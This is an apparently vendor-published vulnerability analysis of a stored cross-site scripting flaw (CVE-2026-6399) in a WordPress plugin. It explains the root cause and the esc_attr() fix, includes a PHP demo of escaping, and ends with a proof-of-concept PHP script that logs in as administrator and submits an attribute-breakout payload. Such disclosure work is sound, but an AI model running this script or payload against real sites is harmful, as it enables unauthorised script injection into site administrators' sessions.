Atomic Edge analysis of CVE-2026-6399 (metadata-based): This vulnerability in General Options <= 1.1.0 allows authenticated attackers with Administrator-level access to execute stored cross-site scripting via the 'ad_contact_number' parameter. The CVSS score is 4.4 (medium), reflecting the high privileges required but the potential for script execution in the admin context.
The root cause is improper output escaping of the 'ad_contact_number' field. The plugin uses sanitize_text_field() on input, which strips HTML tags but does not encode double-quote characters to &quot;. When the stored value is echoed inside a double-quoted HTML attribute (value="…"), an attacker-supplied double-quote breaks out of the attribute context. WordPress's wp_magic_quotes mechanism adds a backslash before quotes (creating \"), but HTML parsers treat this as a literal backslash followed by a closing quote, not an escaped quote. This is inferred from the CWE-79 classification and the detailed description; no code diff confirms this, but the pattern matches known WordPress plugin XSS vulnerabilities.
Exploitation requires Administrator-level access to a WordPress site. The attacker navigates to the General Options settings page (likely at /wp-admin/options-general.php?page=general-options or similar). They inject a payload into the 'ad_contact_number' field, such as: " onclick=alert(1) x=". The sanitize_text_field() function strips any HTML tags but passes the double-quote. WordPress's magic quotes convert " to \", but the backslash is rendered literally, and the quote breaks out of the attribute. When any Administrator visits the settings page, the stored value is output in an HTML attribute (e.g., value="…"), causing the injected JavaScript to execute. The attack vector is a crafted POST request to the plugin's settings update endpoint, likely via the WordPress admin interface or directly to an AJAX handler.
Remediation requires proper output escaping when echoing the value inside an HTML attribute. The fix should use esc_attr() instead of sanitize_text_field() for output context. esc_attr() encodes double-quote characters to &quot;, preventing attribute breakout. Since the description indicates sanitize_text_field() is used for output escaping, the developer likely confused sanitization with escaping. The patch should replace the output function with the appropriate escaping function for the attribute context. No patched version is available, so site administrators should disable the plugin or remove the vulnerable field entirely.
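To make the sanitization-versus-escaping distinction concrete, here is an added example (not the plugin's code) that renders a stored value with the vulnerable pattern and with esc_attr(), then parses the result the way a browser would. The sanitize_text_field_stub() and esc_attr_stub() helpers are simplified stand-ins for the WordPress functions so the script runs outside WordPress, and the sample values are constructed.

```php
<?php
// Simplified stand-ins for the two WordPress helpers the analysis contrasts.
// Real sanitize_text_field() also strips invalid octets and normalises whitespace;
// real esc_attr() goes through _wp_specialchars(). Both stubs are assumptions.
function sanitize_text_field_stub( string $s ): string {
    return trim( strip_tags( $s ) );          // removes tags, leaves quotes intact
}
function esc_attr_stub( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES | ENT_HTML5, 'UTF-8' ); // " becomes &quot;
}

// Vulnerable pattern described above: sanitize on output, no attribute escaping.
function render_vulnerable( string $stored ): string {
    return '<input type="text" name="ad_contact_number" value="'
        . sanitize_text_field_stub( $stored ) . '">';
}
// Remediated pattern: esc_attr() for the double-quoted attribute context.
function render_fixed( string $stored ): string {
    return '<input type="text" name="ad_contact_number" value="'
        . esc_attr_stub( $stored ) . '">';
}

// Parse the markup as a browser would and return the attributes the <input> ends up with.
function input_attributes( string $html ): array {
    $doc = new DOMDocument();
    @$doc->loadHTML( '<html><body>' . $html . '</body></html>' );
    $input = $doc->getElementsByTagName( 'input' )->item( 0 );
    $attrs = [];
    foreach ( $input->attributes as $a ) {
        $attrs[ $a->name ] = $a->value;
    }
    return $attrs;
}

// Constructed sample values: a quote-bearing string, and the same string after
// addslashes(), mirroring the backslash that wp_magic_quotes adds before quotes.
$samples = [
    'plain quote'     => '555-0100" data-x="y',
    'backslash quote' => addslashes( '555-0100" data-x="y' ),
];
foreach ( $samples as $label => $value ) {
    foreach ( [ 'vulnerable' => render_vulnerable( $value ), 'fixed' => render_fixed( $value ) ] as $kind => $html ) {
        $attrs = input_attributes( $html );
        $extra = array_diff_key( $attrs, array_flip( [ 'type', 'name', 'value' ] ) );
        printf( "%-16s %-10s extra attributes: %s\n", $label, $kind,
            $extra ? implode( ',', array_keys( $extra ) ) : 'none' );
    }
}
```

Both vulnerable renderings gain an unexpected data-x attribute, backslash or not, because HTML has no backslash escaping inside attributes; both esc_attr() renderings keep the entire string inside the value attribute.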
If exploited, this vulnerability allows an attacker to inject arbitrary JavaScript in the WordPress admin context. Since it requires Administrator-level access, the primary impact is cross-site scripting in the admin panel. An attacker could execute scripts when other Administrators visit the settings page, potentially stealing session cookies, performing administrative actions on behalf of the victim, or injecting malicious content. The CVSS vector limits impact to low confidentiality and low integrity due to the admin-only scope and high privileges required. However, in a multi-administrator environment, a compromised administrator account could use this to target other administrators, potentially leading to further compromise.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6399 - General Options <= 1.1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'ad_contact_number' Parameter
// Configuration: Set the target WordPress site URL and admin credentials
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$admin_username = 'admin'; // Administrator username
$admin_password = 'password'; // Administrator password
// The vulnerable parameter name
$param_name = 'ad_contact_number';
// Payload: double-quote to break out of the HTML attribute context and inject JavaScript
// sanitize_text_field() strips HTML tags, so we cannot use <script> tags.
// Instead, we use a double-quote to close the attribute, then add an event handler.
$payload = '" onclick=alert(document.domain) x=';
echo "[+] CVE-2026-6399 Proof of Concept\n";
echo "[+] Target: $target_url\n\n";
// Step 1: Authenticate as administrator
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $admin_username,
'pwd' => $admin_password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2026-6399-cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code !== 200) {
die("[-] Failed to authenticate. HTTP code: $http_code\n");
}
echo "[+] Authenticated successfully as $admin_username\n";
// Step 2: Detect the plugin settings page URL
// The plugin likely registers a menu page under Settings or Options.
// Common patterns: /wp-admin/admin.php?page=general-options or /wp-admin/options-general.php?page=general-options
$settings_url_attempts = array(
$target_url . '/wp-admin/admin.php?page=general-options',
$target_url . '/wp-admin/options-general.php?page=general-options',
$target_url . '/wp-admin/admin.php?page=general_options'
);
$settings_page_url = null;
foreach ($settings_url_attempts as $url) {
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code === 200 && strpos($response, 'general-options') !== false) {
$settings_page_url = $url;
break;
}
}
if ($settings_page_url === null) {
// If automatic detection fails, assume a common default
$settings_page_url = $target_url . '/wp-admin/options-general.php?page=general-options';
echo "[!] Could not detect settings page; assuming $settings_page_url\n";
} else {
echo "[+] Detected settings page: $settings_page_url\n";
}
// Step 3: Submit the payload to the vulnerable field
// The plugin likely uses a form POST to its own admin page.
// We need to determine the exact action URL and nonce.
// For this PoC, we attempt to POST directly to the settings page with the payload.
// The plugin may handle saving via admin-post.php or direct POST to the settings page.
// Attempt 1: Direct POST to the settings page (common for simple plugins)
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
$param_name => $payload,
'option_page' => 'general-options',
'action' => 'update',
'_wpnonce' => '' // Nonce may be required; we attempt without first
)));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-6399-cookies.txt');
$response = curl_exec($ch);
// Check if the payload was stored by visiting a page that outputs it.
// The vulnerable output likely appears on the same settings page.
// We re-fetch the settings page and verify the payload is reflected.
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);
if (strpos($response, $payload) !== false) {
echo "[+] Exploit successful! Payload injected.\n";
echo "[+] Payload: $payload\n";
echo "[+] Visit $settings_page_url as an administrator to trigger XSS.\n";
} else {
echo "[-] Exploit may have failed. The payload was not reflected in the response.\n";
echo "[!] This may be due to nonce validation or incorrect request format.\n";
echo "[!] Try using the WordPress admin interface directly with the payload as the ad_contact_number value.\n";
}
curl_close($ch);
?>